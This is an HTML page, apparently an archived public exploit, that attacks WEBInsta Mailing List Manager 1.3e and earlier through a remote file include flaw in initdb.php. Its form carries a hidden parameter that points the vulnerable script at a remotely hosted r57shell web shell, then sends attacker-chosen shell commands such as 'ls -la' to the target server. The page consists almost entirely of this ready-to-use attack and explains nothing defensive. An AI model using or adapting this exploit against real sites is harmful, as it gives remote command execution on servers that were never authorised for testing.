<head> <title>WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit</title> </head> <script language="JavaScript"> function milw0rm() { if (document.exploit.target.value=="") { alert("Enter a Target"); return false; } exploit.action= document.exploit.target.value; exploit.cmd.value=document.exploit.cmd.value; exploit.dir.value=document.exploit.dir.value; exploit.submit(); } </script> <body> <form name="exploit" target="exploitframe" method="post" onSubmit="milw0rm();"> <table width="975" border="0"> <tr> <td width="961" align="left" valign="top" nowrap="nowrap"><strong>WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit</strong></td> </tr> <tr> <td><em> <input type="hidden" name="absolute_path" value="http://rst.void.ru/download/r57shell.txt?&" /> </em><strong>*</strong><em>target</em> <input name="target" type="text" value="http://www.site.com/maillist/inc/initdb.php" size="50" maxlength="150" /> <strong> *</strong><em>cmd</em> <input name="cmd" type="text" value="ls -la"> <strong>*</strong><em>dir</em> <input name="dir" type="text" value="."> <em> <input type="submit" name="Submit" value="Exploit" /> </em></td> </tr> </table> <p> <iframe name="exploitframe" height="410" width="1100" scrolling="yes" frameborder="0"></iframe> </p> </form> </body> </html>